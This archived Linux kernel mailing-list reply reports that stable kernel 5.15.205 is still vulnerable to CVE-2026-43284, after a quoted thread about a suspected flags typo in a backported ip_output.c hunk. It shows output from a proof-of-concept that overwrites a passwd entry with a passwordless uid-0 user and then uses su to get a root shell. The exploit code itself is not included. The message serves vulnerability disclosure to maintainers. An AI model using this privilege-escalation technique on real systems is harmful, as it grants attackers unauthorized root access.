Re: Linux 5.15.205

Next message: Frederic Weisbecker: "[PATCH 01/15] tick/sched: Fix TOCTOU in nohz idle time fetch"
Previous message: Pranjal Shrivastava: "Re: [PATCH] iommu/arm-smmu-v3-sva: Enable Hardware Access and Hardware Dirty bits"
In reply to: gregkh@xxxxxxxxxxxxxxxxxxx: "Re: Linux 5.15.205"
Next in thread: gregkh@xxxxxxxxxxxxxxxxxxx: "Re: Linux 5.15.205"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

From: Massimiliano Pellizzer

Date: Fri May 08 2026 - 09:17:09 EST

On Fri, May 8, 2026 at 2:44 PM gregkh@xxxxxxxxxxxxxxxxxxx
<gregkh@xxxxxxxxxxxxxxxxxxx> wrote:
>
> On Fri, May 08, 2026 at 12:05:02PM +0000, Dominik Grzegorzek wrote:
> > Hi,
> >
> > I may be mistaken, but I think there might be a small typo in this hunk in net/ipv4/ip_output.c:
> >
> > skb_shinfo(skb)->tx_flags |= SKBFL_SHARED_FRAG;
> >
> > Would this need to be:
> >
> > skb_shinfo(skb)->flags |= SKBFL_SHARED_FRAG;
> >
> > My understanding is that SKBFL_SHARED_FRAG is a bit in skb_shared_info->flags, and skb_has_shared_frag() checks skb_shinfo(skb)->flags.
>
> Adding Ben who did the 5.10 backport so he can comment on this.
>
> thanks,
>
> greg k-h
>

Hi,

The new released kernel 5.15.205 is still vulnerable to CVE-2026-43284.

```
$ ./run.sh
=== Stage 1 — overwrite 'systemd-timesync' line (89 bytes) with
'sick::0:0:<pad>:/:/bin/bash'
=== Stage 2 — verify
sick::0:0:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:/:/bin/bash
=== Stage 3 — su - sick (empty password via PAM nullok)
[i] state saved to /var/tmp/.cf2.state — run './run.sh --clean' to revert
# uname -r
5.15.205
```